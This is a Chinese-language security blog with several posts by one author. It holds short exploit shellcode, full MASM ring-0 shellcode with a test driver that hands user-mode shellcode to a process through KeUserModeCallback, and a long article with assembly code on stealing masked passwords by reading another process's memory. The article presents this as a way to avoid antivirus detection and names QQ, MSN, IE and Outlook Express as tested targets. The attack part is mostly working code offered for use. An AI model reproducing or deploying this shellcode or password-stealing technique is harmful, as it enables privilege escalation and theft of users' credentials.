漫漫安全路

还以为BLOG被关了,又开了太好了.发点SHELLCODE

czy82 — Thu, 26 Apr 2012 01:23:00 GMT

最近那啥流行的EXP用得上的.

MOV       ESI,ESP
SUB       ESI,40
MOV       ESI,[ESI]
MOV       EAX,8000FFFF
MOV       EBP,ESP
ADD       EBP,40   ;EBP
JMP       ESI
ADD       [EAX],AL
ADD       [ECX],AL

不多说

R0 shellcode

czy82 — Fri, 06 Jan 2012 20:29:00 GMT

;r0 shellcode 有些文件型洞是在驱动中触发用这个方法可以让以前的r3 shellcode还有用

;具体实现是通过KeUserModeCallback在R0把R3的Shellcode移到应用层环境中执行,小需要

;注意的是KeUserModeCallback的调用有较大的条件限制要具体漏洞具体分析!!!
.386
.model flat, stdcall
option casemap:none

include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc
include \masm32\include\w2k\ntoskrnl.inc
include \masm32\include\w2k\w2kundoc.inc
include \masm32\macros\Strings.mac
includelib \masm32\lib\w2k\ntoskrnl.lib

.const
IOCTL_CALLBCK              equ 224000h
CCOUNTED_UNICODE_STRING    "\\Device\\pdf0daytest", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING    "\\??\\pdf0daytest", g_usSymbolicLinkName, 4
.data
shellcodebuf                    db 1024 dup(0)

.code
MyShellcode proc
            pushad
            ;int 3
            ;invoke DbgPrint, $CTA0("ntoskrnl addr:%08X\n"),eax
@@shellcodebegin:
    call @@beginaddr
@@beginaddr:
PUSH 03H      ;要调用的API函数个数
    jmp @@realshellcode
    ;db 00h        ;字节对齐,同时空四个00出来
myZwQueryInformationProcess dd 0b16fe439h ;[EDI-0CH]
myZwAllocateVirtualMemory   dd 0d33d4aedh ;[EDI-08H]
myKeUserModeCallback        dd 0c126d6e0h ;[EDI-04H]
BasicInfo                   PROCESS_BASIC_INFORMATION <>
ReturenLength               dd 0
r3scbuf                     dd 0
r3scbuflen                  dd 1000H
ResultBuffer                dd 0
ResultLentgh                dd 0
argbuf                      dd 0
@@realshellcode:
    POP ECX
    POP EDI
    SCASD ;edi+4
    ;SCASD ;edi+4
;得到ntoskrnl基地址
    assume fs:nothing
    mov eax,[fs:1ch]
    mov eax,[EAX+34h]
    add eax,18h
    mov eax,[eax]
    mov eax,[eax]
    mov ebp,[eax+18h]
;处理导出表
@@next2:
PUSH      ECX
MOV       ESI,[EBP+3Ch]
MOV       ESI,[EBP+ESI+78h]
ADD       ESI,EBP
PUSH      ESI
MOV       ESI,[ESI+20h]
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX
@@next:
INC       ECX
LODSD
ADD       EAX,EBP
XOR       EBX,EBX
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH
    JZ        @@end
    ROR       EBX,0Dh
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]
JNZ       @@next

POP       ESI
MOV       EBX,[ESI+24h]
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX*2+EBX]
MOV       EBX,[ESI+1Ch]
ADD       EBX,EBP
MOV       EAX,[ECX*4+EBX]
ADD       EAX,EBP
STOSD
POP       ECX
loop @@next2
            comment #
             mov eax,[edi-08H]
             invoke DbgPrint, $CTA0("zwallmemory addr:%08X\n"),eax

             mov eax,[edi-04H]
             invoke DbgPrint, $CTA0("keusermod addr:%08X\n"),eax

             mov eax,[edi-0CH]
             invoke DbgPrint, $CTA0("queryinfo addr:%08X\n"),eax
             #

;PROCESS_BASIC_INFORMATION STRUCT ; sizeof = 18h
; ExitStatus    NTSTATUS ?
; PebBaseAddress   PVOID  ? ; PPEB
; AffinityMask   DWORD  ?
; BasePriority   DWORD  ? ; KPRIORITY
; UniqueProcessId   DWORD  ?
; InheritedFromUniqueProcessId DWORD  ?
;PROCESS_BASIC_INFORMATION ENDS
;PPROCESS_BASIC_INFORMATION typedef PTR PROCESS_BASIC_INFORMATION

lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)]
push eax
push sizeof(PROCESS_BASIC_INFORMATION)
push edi
push ProcessBasicInformation ;0
or eax,-1
push eax
call dword ptr [EDI-0CH]
;assume edi:ptr PROCESS_BASIC_INFORMATION
;mov eax,[edi].PebBaseAddress
;assume edi:nothing

;invoke DbgPrint, $CTA0("peb addr:%08X\n"),eax

;ZwAllocateVirtualMemory(NtCurrentProcess(),&pBuf,0,&buflen,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

push PAGE_EXECUTE_READWRITE
push MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+8]
push eax
push 0
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
push eax
or   eax,-1
push eax
call dword ptr [EDI-08H]
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
mov eax,[eax]
            ;invoke DbgPrint, $CTA0("mem addr:%08X\n"),eax
;copy r3 shellcode
mov ebx,eax
add eax,4
mov [ebx],eax
add ebx,4
call @@beginr3scaddr
@@beginr3scaddr:
jmp @@realshellcode2
sc   db   0E8H,00H,00H,00H,00H,59H,0ebH,05H,'c',':','\','p',00H,83H,0c1H,03H,6Ah,00H,51H,0B8H,19H,062H,082H,7cH,0FFH,0D0H,0C2H,08H,00H
@@realshellcode2:
pop esi
add esi,2
mov ecx,8
@@nextcopyr3sc:
mov eax,[esi]
mov [ebx],eax
add esi,4
add ebx,4
loop @@nextcopyr3sc

;KeUserModeCallback(ApiIndex,Arguments,sizeof(ULONG)*(ARGUMENTSCOUNT+1),&ResultBuffer,&ResultLentgh);

assume edi:ptr PROCESS_BASIC_INFORMATION
mov eax,[edi].PebBaseAddress
assume edi:nothing
.if eax!=0
mov ebx,[eax+2ch] ;KernelCallBackTable
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
mov eax,[eax]
sub eax,ebx
shr eax,2 ;eax/4
mov ebx,eax ;apiindex
.else
jmp @@exitr0
.endif

lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+10h]
push eax
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+0ch]
push eax
push 4
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+14h]
push eax
push ebx
call dword ptr [EDI-04H]
@@exitr0:
             popad
             ret
MyShellcode endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchControl proc uses esi edi ebx pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP

local status:NTSTATUS
local dwBytesReturned:DWORD

and dwBytesReturned, 0

mov esi, pIrp
assume esi:ptr _IRP

    IoGetCurrentIrpStackLocation esi
    mov edi, eax
    assume edi:ptr IO_STACK_LOCATION

    .if [edi].Parameters.DeviceIoControl.IoControlCode == IOCTL_CALLBCK

            invoke DbgPrint, $CTA0("IOCTL_CALLBCK\n")
            invoke RtlMoveMemory,addr shellcodebuf,MyShellcode,1000d
            lea eax,shellcodebuf   ;模拟真实EXP环境
            call eax
            mov status, STATUS_SUCCESS

    .else
        mov status, STATUS_INVALID_DEVICE_REQUEST
    .endif
    assume edi:nothing

    push status
    pop [esi].IoStatus.Status
    push dwBytesReturned
    pop [esi].IoStatus.Information

    assume esi:nothing
    fastcall IofCompleteRequest, pIrp, IO_NO_INCREMENT
    mov eax, status
    ret

DispatchControl endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP

    mov eax, pIrp
    assume eax:ptr _IRP
    mov [eax].IoStatus.Status, STATUS_SUCCESS
    and [eax].IoStatus.Information, 0
    assume eax:nothing

fastcall IofCompleteRequest, pIrp, IO_NO_INCREMENT

mov eax, STATUS_SUCCESS
ret

DispatchCreateClose endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

DriverUnload proc pDriverObject:PDRIVER_OBJECT

    invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
    mov eax, pDriverObject
    invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
    ret

DriverUnload endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;                                       DriverBegin
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PVOID

    mov status, STATUS_DEVICE_CONFIGURATION_ERROR

    invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, \
                                             0, FALSE, addr pDeviceObject

    .if eax == STATUS_SUCCESS
        invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
        .if eax == STATUS_SUCCESS
            mov eax, pDriverObject
            assume eax:PTR DRIVER_OBJECT
            mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)],offset DispatchCreateClose
            mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)],offset DispatchCreateClose
            mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
            mov [eax].DriverUnload, offset DriverUnload
            assume eax:nothing
        .endif
     .endif
    mov status, STATUS_SUCCESS
    mov eax, status
    ret

DriverEntry endp
end DriverEntry

我还活着

czy82 — Wed, 09 Sep 2009 11:33:00 GMT

哈哈.

Edit控件密码窗口的秘密 ---- 一种全新的通用密码记录技术

czy82 — Wed, 08 Aug 2007 11:00:00 GMT

Edit控件密码窗口的秘密
                        ----一种全新的通用密码记录技术


*目前的各类密码记录技术*

  目前各类密码记录程序多如牛毛,但实现原理无非有以下六个:
一:调用CreateRemoteThread函数远程DLL或代码注入.
二:调用SetWindowsHookEx安装键盘钩子记录按键,或是键盘驱动记录按键.(注五)
三:伪造登陆界面.
四:登录信息在网络传输过程中被嗅探.
五:分析目标程序流层,文件补丁技术(注一).
六:分析目标程序流层,搜索并读取存放在内存中(比如:全局变量)的密码.

  由于后四个技术都要对目标程序进行专门的分析所以更多的用在专用游戏盗号程序中.这样目前通用的获取目标主机各类程序登录密码的技术还是紧紧局限于前两个.

*两大主流密码记录技术的局限性*

  对于键盘记录技术由于用户可能会不按顺序输入密码所以正确率有限,要是安装键盘驱动还要Admin权限同时更难以区分用户是输密码还是其它输入(在驱动下可没有GetActiveWindow函数呵呵).
  对于第一种技术前面所说的问题都不存在,并且用各种语言编写的源代码广为流传,所以水平高一点点的黑客都会使用,但也正因为这个远线程注入技术实在太流行,所以很多杀毒软件一但发现有程序调用了CreateRemoteThread这个API就会提示并拦截(比如江民公司的"木马一扫光").同样安装键盘钩子比如调用SetWindowsHookEx有些杀毒软件也会提示.
难道就没有通用性相对较好,记录正确率高,不容易被杀毒软件查杀的技术了吗?请看下文.

*目前的思路*

  对于WINDOWS程序中的密码窗口通常是具有ES_PASSWORD风格的EDIT控件(通常输入内容显示为*号),在WINDOWS 98下要记录密码,只用给这种窗体发送一个WM_GETTEXT消息就可以了没有任何限制,在WIN2000以后的操作系统中,微软也意识到这样太不安全,所以限制为进程只可以给自已的具有ES_PASSWORD风格的EDIT控件窗口发送WM_GETTEXT消息并正确得到窗口内容(注二).这样也就很好理解为什么目前的两大主流技术要么是建一个远程线程,要么HOOK键盘了.现在的程序和WIN98时代很明显的区别就是都要多一个DLL.
(直接代码注入的可以不要DLL但还是会调用可能引起杀毒软件提示的API函数)

*新的思路*

  在EDIT控件输入字符以后,这些字符当然是被记录在EDIT控件所在的进程可以仿问的内存中的.可不可以直接从内存中读取内容呢?
也就是写了一个自已的不受微软限制的GetWindowText函数,或是叫GetWindowPass函数.读内存可以调用OpenProcess和ReadProcessMemory
或是集成这两个函数的Toolhelp32ReadProcessMemory.怎么读的问题解决了,现在就是读哪个位置的问题.另外OpenProcess
不代写内存的参数一般杀毒软件不会提示(注三).


*读哪儿?*

  解决这个问题首先我们还是看看微软是怎么读的吧.大家都知道要取得EDIT控件的内容可以发WM_GETTEXT消息或是调用USER32.DLL中
的GetWindowTextA函数.打开WIN32DASM和SOFTICE.一路跟踪后总算基本明白了其中的原理,重要代码反汇编如下:共有三部分
(USER32.DLL 5.1.2600.2180,XPSP2 PRO CN)

第一部分:
GetWindowText函数执行后很快就会调用如下代码:重要的地方会有注解:)

:77D184D0 8BFF                   mov edi, edi
:77D184D2 55                   push ebp
:77D184D3 8BEC                   mov ebp, esp
:77D184D5 51                   push ecx
:77D184D6 53                   push ebx
:77D184D7 56                   push esi
:77D184D8 57                   push edi
:77D184D9 8855FC                mov byte ptr [ebp-04], dl
:77D184DC 8BF9                   mov edi, ecx                   ;edi中为密码窗口句柄
:77D184DE 33F6                   xor esi, esi
:77D184E0 64A118000000          mov eax, dword ptr fs:[00000018]  ;得到当前线程的TEB
:77D184E6 8B0D6000D777          mov ecx, dword ptr [77D70060]
:77D184EC 8D98CC060000          lea ebx, dword ptr [eax+000006CC] ;当前线程TEB的基地址+6CCH放入EBX中
:77D184F2 8BC7                   mov eax, edi
:77D184F4 25FFFF0000             and eax, 0000FFFF                ;eax中为密码窗口句柄的低16位
:77D184F9 3B4108                cmp eax, dword ptr [ecx+08]
:77D184FC 734D                   jnb 77D1854B
:77D184FE 8B0D8400D777          mov ecx, dword ptr [77D70084]    ;77D70084是USER32.DLL中的一个全局变量的地址,重要!
:77D18504 8D0440                lea eax, dword ptr [eax+2*eax]
:77D18507 8D0C81                lea ecx, dword ptr [ecx+4*eax] ;ecx为(密码窗口句柄低16位x12)+一个未知全局变量
--------------------------无关代码省略之-------------
:77D1852F 8B31                   mov esi, dword ptr [ecx]       ;ecx的值没变,取里面的值给esi
:77D18531 0F8471A40100          je 77D329A8
:77D18537 3B30                   cmp esi, dword ptr [eax]
:77D18539 0F8269A40100          jb 77D329A8
:77D1853F 3B7004                cmp esi, dword ptr [eax+04]
:77D18542 0F8360A40100          jnb 77D329A8
:77D18548 2B731C                sub esi, dword ptr [ebx+1C]
;刚才的值-RealClientID,EBX+1C接合上面的代码看就是当前线程TEB的基地址+6CCH+1CH,取得的值也就是当前线程的RealClientID

第二部分
经过一些跳转后会调用EditWndProc,其中的关键代码如下:

Exported fn(): EditWndProc - Ord:00C1h ;函数入口
:77D2C538 8BFF                   mov edi, edi
:77D2C53A 55                   push ebp
:77D2C53B 8BEC                   mov ebp, esp
:77D2C53D 83EC1C                sub esp, 0000001C
:77D2C540 8B550C                mov edx, dword ptr [ebp+0C]       ;如果EDX为0Dh说明是取得窗口的内容
:77D2C543 53                   push ebx
:77D2C544 56                   push esi
:77D2C545 57                   push edi
:77D2C546 8B7D08                mov edi, dword ptr [ebp+08]
:77D2C549 8B07                   mov eax, dword ptr [edi]
:77D2C54B 8BB7A4000000          mov esi, dword ptr [edi+000000A4]  ;这儿的EDI和前面代码最后的ESI是同一个值,重要!
:77D2C551 33C9                   xor ecx, ecx                      ;计算后ESI就是一个指向窗口内容结构的指针
:77D2C553 8945F4                mov dword ptr [ebp-0C], eax
:77D2C556 41                   inc ecx
---------------------无关代码省略之---------------
:77D2C5B9 51                   push ecx
:77D2C5BA FF7514                push [ebp+14]
:77D2C5BD FF7510                push [ebp+10]
:77D2C5C0 56                   push esi
:77D2C5C1 E88E040000             call 77D2CA54 ;得到窗口内容

第三部分:
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:77D2C665(C)
|
:77D41496 837E0C00             cmp dword ptr [esi+0C], 00000000
:77D4149A 7427                   je 77D414C3
:77D4149C 668B466A             mov ax, word ptr [esi+6A]
:77D414A0 660FAF460C             imul ax, word ptr [esi+0C]       ;esi和上面的一样指向窗口结构,ESI+0C是取得密码长度
:77D414A5 668945FA             mov word ptr [ebp-06], ax
:77D414A9 668945F8             mov word ptr [ebp-08], ax
:77D414AD 8D45F8                lea eax, dword ptr [ebp-08]
:77D414B0 50                   push eax
:77D414B1 33C0                   xor eax, eax
:77D414B3 8A86EC000000          mov al, byte ptr [esi+000000EC]    ;ESI+EC解码密码的变量,总是一个字节
:77D414B9 897DFC                mov dword ptr [ebp-04], edi
:77D414BC 50                   push eax

* Reference To: ntdll.RtlRunDecodeUnicodeString, Ord:0304h
                              |
:77D414BD FF154410D177          Call dword ptr [77D11044]          ;对该函数分析可知,esi+00存放编码后的密码的地址

*分析GetWindowTextA后的总结*

分析流层可知道GetWindowTextA函数要取得一个EDIT控件的内容要得到如下参数:
1.窗口句柄,线程,进程ID,2.窗口所在的线程的TEB(线程环境块),3.窗口所在的进程加载的USER32.DLL中的一个未知的全局变量.
我们的进程可不可以获得这三个参数呢?
对于句柄可以使用的函数有GetWindow,WindowFromPoint,EnumWindows等,由句柄得到进程,线程ID调用GetWindowThreadProcessId
对于窗口所在的线程的TEB,我查阅NATIVE API手册后找到了ZwQueryInformationThread,当然先要调用OpenThread得到线程句柄
对于第三个参数,它的值一般总是为00XX0000,它其实就是进程的GUI TABLE在R3层的映射的基地址.GUI TABLE也就是用户对象句柄表,
它里面的值简单的说就是一些指向窗体信息结构的指针.

*获得GUI TABLE在R3成层的映射基地址*

我的系统中,记录这个地址的变量的地址是77D70084,在SOFTICE中对这个地址下BPM写断点,发现每个进程加载USER32.DLL的时候一般是要
调用这个DLL中的UserClientDllInitialize,在这个函数的如下代码处

:77D21020 8DB5A0FAFFFF          lea esi, dword ptr [ebp+FFFFFAA0]
:77D21026 BF8000D777             mov edi, 77D70080    ;注意不是77D70084
:77D2102B F3                   repz
:77D2102C A5                   movsd

会对这个变量赋初值.然后打开W32DASM,查找77d70084和77d70080,结果发现了一个UNDOCUMENT API:UserRegisterWowHandlers!
分析这个函数的最后面的代码可以看出这个函数的返回值就是记录GUI TABLE在R3成层的映射基地址的变量的地址-4.代码如下:

:77D535F5 B88000D777             mov eax, 77D70080
:77D535FA 5D                   pop ebp
:77D535FB C20800                ret 0008

到此理论上要实现直接内存读取密码应该没有问题了,下面看看具体的算法是什么:)

*把密码算出来*

第一步:
取窗口句柄的低16位然后乘以12,我们设结果为HwndIndex
第二步:
得到GUI TABLE在R3成层的映射基地址,我们设这个地址为GuiTableBase
第三步:GuiTableBase+HwndIndex,然后取里面的值得到PHwndStruct1
第四步:
TEB基地址+6cch+1ch,取里面的值,得到RealClientID
第五步:
PHwndStruct1-RealClientID得到PHwndStruct2
第六步:
PHwndStruct2+A4H,取里面的值得到真正的记录窗体信息的结构的地址设结果为PRealWinStruct
第七步:
PRealWinStruct+00h里面的值是编码后的密码的地址
PRealWinStruct+0ch里面值是密码长度我们叫PASSLEN
PRealWinStruct+ech里面值是解码要用到的一个变量我们叫ENCODE.
第八步:
解码算法,通过对RtlRunDecodeUnicodeString分析后解码算法如下:

MOV EDX,ENCODE
      mov cl,dl
      mov edi,PASSLEN
@@nextpass:
      CMP EDI,1
      JBE @@firstpass
      mov eax,esi    ;esi指向编码后的密码的第一个字节.
      add eax,edi
      mov dl,[eax-2]
      xor dl,[eax-1]
      xor dl,cl ;重要
      mov [eax-1],dl
      dec edi
      jmp @@nextpass
@@firstpass:
      or  cl,43h
      mov edx,offset buffer1
      xor [edx],cl

  注意通过对多个2K,XP,2003系统的分析前面五步以及八步始终没有变化,第六步WIN2000是+98h
2003是+a0h,第七步,2000和2003都是+0CH,XP是+14H或+0ch

*具体编码*

为了证明思路的正确性,专门写了一个WINDOWS2K/XP/2003下看星号密码的小程序,当然完全不用远程注入线程了.
下面把关键实现代码分析一下:

第一步:得到密码密窗口句柄:

            invoke GetCursorPos,addr @stPoint          ;得到当前光标位置
invoke WindowFromPoint,@stPoint.x,@stPoint.y  ;得到光标下窗口的句柄
mov @hWindow,eax
.if eax != NULL
invoke GetWindowLong,@hWindow,GWL_STYLE    ;得到窗口风格
.if (eax & ES_PASSWORD)                   ;是密码框吗?
                  invoke GetClassName,@hWindow,offset classname,64 ;如果是得到控件类名
                  invoke lstrcmpi,offset classname,offset editname
                  .if eax == 0                                     ;如果类名是Edit,那么调用ViewPass函数读密码
                  mov eax,@hWindow
                  mov WINHAND,eax
                  invoke ViewPass
                  .endif

.endif
.endif

第二步:判断系统:

LOCAL verinfo:OSVERSIONINFO

mov    verinfo.dwOSVersionInfoSize,sizeof OSVERSIONINFO
invoke  GetVersionEx,addr verinfo
.if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT && verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 1)
      mov eax,1 ;xp
      mov passoffset,0A4H
      mov lenoffset ,14H
      .......

程序只取WIN2000/XP/2003系统的密码,同时根据不同的系统设置偏移.经过测试
同一种系统偏移没有变化,所以通用性应该很好.

第三步:得到密码窗口的线程和进程ID
            invoke GetWindowThreadProcessId,eBx,addr parid
            MOV WINTHREADID,EAX ;返回值为线程ID
第一个参数为窗口句柄,第二个参数为得到进程ID

第四步:根据窗口所在的进程的进程号得到这个进程加载的USER32.DLL的基地址

invoke GetUser32Base,parid
返回值就是基地址:)

GetUser32Base  proc uses ebx esi edi remoteproid
         LOCAL hSnapshot:dword
         LOCAL modinfo:MODULEENTRY32
         LOCAL modname[256]:byte

      mov       modinfo.dwSize,sizeof MODULEENTRY32
      invoke  CreateToolhelp32Snapshot,TH32CS_SNAPMODULE,remoteproid ;第一个参数表示例举模块
      mov    hSnapshot,eax
      invoke  Module32First,hSnapshot,addr modinfo ;结果放在modinfo结构中,modBaseAddr成员记录
      .while eax                                  ;相应模块加载的基地址
      lea    ecx,modinfo.szModule
      invoke  lstrcmpi,offset user32dll,ecx  ;比较模块名是否为user32.dll
      .if    eax == 0
            mov eax,modinfo.modBaseAddr
            ret
      .endif
      invoke  Module32Next,hSnapshot,addr modinfo
      .endw
      invoke CloseHandle,hSnapshot

            ret
GetUser32Base endp

第五步:
根据窗口所在的线程得到该线程的TEB地址
      invoke  OpenThread,THREAD_QUERY_INFORMATION,FALSE,WINTHREADID ;线程ID
      .if eax != NULL
            mov    THREADHAND,EAX
              invoke LoadLibrary,offset Ntdll
            invoke GetProcAddress,eax,offset _ZwQueryInformationThread ;调用NAVITE API
            mov    apiquerthread,eax
            push 0
            push sizeof THREAD_BASIC_INFORMATION
            lea    ecx,threadinfo
            push ecx
            push ThreadBasicInformation
            push THREADHAND
            call apiquerthread
            .IF EAX == STATUS_SUCCESS
                  lea ecx,threadinfo
                  mov esi,[ecx+4] ;得到TEB了,通常为7FFDX000
            .ELSE
                  invoke MessageBox,0,offset errgetteb,offset vp,1
                  ret
            .ENDIF
      .else
         invoke MessageBox,0,offset erropenthread,offset vp,1
         ret
      .endif

第六步:得到TEB中的RealClientID,注意这儿是读目标程序的内存,不是自已的了.

      add esi,6cch  ;看第五步,ESI中为目标线程的TEB基地址,如果是程序自已获得自已的TEB
      add esi,1ch ;只用MOV EAX,FS:[18]就行了,也就是文章中间反汇编看到的那样.
      invoke Toolhelp32ReadProcessMemory,parid,esi,offset buffer1,4,NULL
;第一个参数为密码所在窗口进程PID,第二个是读的起始地址,第三个是放在哪儿,第四是读长度,第五实际读取
      .if eax == TRUE ;为真说明读成功
            mov eax,offset buffer1
            mov eax,[eax]
            mov edi,eax
            .if eax ==NULL
            invoke MessageBox,0,offset errnorealcid,offset vp,1
            ret
            .endif
      .endif

第七步:得到目标进程R3层的GUI TABLE基地址

这一步应该是这个程序最关键的部分,希望大家认真阅读.先介绍一下我的思路:
我们已经知道这个基地址存放在目标程序加载的USER32.DLL的全局变量中.并且这个DLL中的UserRegisterWowHandlers
函数的返回值就是这个全局变量的地址.
  首先想到的办法是直接调用这个函数,但是通过对这个函数的反汇编分析后发现该函数的参数难以正确构造特别是
在WIN2003系统下该函数会比较严格的检查参数,所以就放弃了直接调用该函数得到基地址的办法.
  通过对不同系统的这个函数反汇编我们可以很容易的找到共同点:
2K系统:(5.0.2195.7032)
:77E3565D B880D2E477             mov eax, 77E4D280
:77E35662 C20800                ret 0008

XP系统:(5.1.2600.2180)
:77D535F5 B88000D777             mov eax, 77D70080
:77D535FA 5D                   pop ebp
:77D535FB C20800                ret 0008

2003系统:(5.2.3790.1830)
:77E514D9 B8C024E777             mov eax, 77E724C0
:77E514DE C9                   leave
:77E514DF C2080000             ret 0008
分析共同点以后,我们就可以写出相应的算法.我的算法是:
1.得到我的进程自身的USER32.DLL的基地址,我们设为user32base(其实也就是LoadLibrary加载这个DLL的返回值)
2.调用GetProcAddress得到UserRegisterWowHandlers的入口地址.
3.从入口地址处读1000个字节(这个函数功能其实很简单1000个字节足够了)
4.在这1000个字节中,我使用了LDE32库的汇编指令长度判断函数(注四).给出指令的首地址可以准确的计算出指令的长度.
这样我先找长度为3的指令,同时指令内容要为C20800(UserRegisterWowHandlers只有两个参数所以用这种方法找这个指令正确率应该很高)
在查找的过程中我用一个局部变量记录每一个指令的长度.在找到C20800后我再倒过去找指令长度为5,同时指令的第一个字节为B8
(也就是mov eax,xxxxxxxx指令)
5.在找到mov eax,xxxxxxxx指令后,取这个地址往后4个字节的值,这个值(我们设为varaddr)通常就是记录GUI TABLE基地址变量的地址
6.分析USER32.DLL的PE文件结构,找出这个DLL的全局变量的起始地址(也就是.data段的虚拟偏移(VirtualAddress)+USER32.DLL的加载基地址).
7.用第5步找到的varaddr-(user32base+VirtualAddress),得到的值就是这个变量在USER32.DLL的全局变量中的相对偏移,我们记为VarOffset,
  如果这个值>0,同时小于.data段的VirtualSize那么说明成功.如果不成功我们再跳到第5步再从后往前重新找mov eax,xxxxxxxx指令.
8.通过前面第四步(根据窗口所在的进程的进程号得到这个进程加载的USER32.DLL的基地址)+VirtualAddress+VarOffset我们就得到了目标
  进程中这个变量的地址,最后再调用Toolhelp32ReadProcessMemory,就可以读出GUI TABLE的基地址了.

(注:由于不能找到直接调用UserRegisterWowHandlers的办法,所以第七步从原理上看并不能保证有100%的成功率,但通过我对多个不同系统
不同版本的测试,目前的这个算法都还是通用)

第八步:最后其实就是把*把密码算出来*这一节的算法实现就0K了.不过要注意的是密码可能是Unicode格式的.

*最后的总结*

所有的分析和技术细节都在上面了,这篇文章要用到PE文件格式,NAVITE API,反汇编等知识如有不懂可以参考网上的相关的资料.

注一:文件补丁技术简单说就是分析目标程序的流层,找出程序本身获得密码框密码的代码,然后在这个代码后面加上一个跳转
  跳到我们新增加的PE节中,在这个节中的代码就是取得密码并记录到文件中,然后再跳回程序原来的流层.

注二:其实要取得密码也可以这样做:发送EW_SETPASSWORDCHAR消息,取消EDIT控件的密码风格,然后再调用GetWindowText函数取密码
  最后再恢复密码框属性,不过对于这种办法,用户很可能会发现异常.
   使用Delphi/BCB工具中的TEDIT类,可以直接发消息,这时微软的限制完全不起作用.

注三:大多数版本的ZoneAlarm是只防止OpenProcess打开系统进程以及IE的进程句柄,对于OpenProcess第三方程序默认中级安全级别下不拦.

注四:程序中使用的LDE32库,是国外的程序员开发的一个专门计算汇编指令长度的小工具,网上有源代码可下载.
该库文件编译后只有600多个字节.

注五:还有一种按键记录技术是用一个死循环不停的调用GetAsyncKeyState和GetKeyState判断同一时间下每个按键的当前状态.
该方法目前也很难被安全软件发现但还是有记录不准确,不能记录不按顺序输入的密码(当然也不能记中文)等问题.

附:
1.看星号程序源代码
2.一个简单的密码框程序
3.测试系统的USER32.DLL

内存读取获得密码(原创)

;                #--------------------------------------#       #
;             #  PassView                            #    #
;             #                                           # #
;          #                                              #
;       #                   2007.1.1                   #
;          #                   codz: czy             # #
;          #------------------------------------------#       #

;test on winXPSP2,qqgame,qqlocalmsgpass,MSN,IE HTTPS/FTP,OE,RAR

            .386
            .model flat, stdcall
            option casemap :none ; case sensitive

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;       Include 数据
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include    \masm32\include\windows.inc
include    \masm32\include\kernel32.inc
include    \masm32\include\user32.inc
include    \masm32\include\gdi32.inc

includelib  \masm32\lib\kernel32.lib
includelib  \masm32\lib\user32.lib
includelib  \masm32\lib\gdi32.lib

CLIENT_ID STRUCT       ; sizeof = 8
      UniqueProcess       HANDLE       ?
      UniqueThread       HANDLE       ?
CLIENT_ID ENDS

THREAD_BASIC_INFORMATION STRUCT       ; sizeof = 1ch
      ExitStatus                               DWORD          ?
      TebBaseAddress                      PVOID             ? ; PTEB
      ClientId                         CLIENT_ID       <> ; 8h
      AffinityMask                      DWORD             ? ;
      Priority                         DWORD             ?
      BasePriority             DWORD             ?
THREAD_BASIC_INFORMATION ENDS

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;       子程序声明
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain       PROTO       :DWORD,:DWORD,:DWORD,:DWORD
ViewPass             proto
_ProcessPeFile       proto :dword
GetUnknowVarOffset    proto
GetUser32Base          proto :dword
CheckOS                proto
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;       Equ 数据
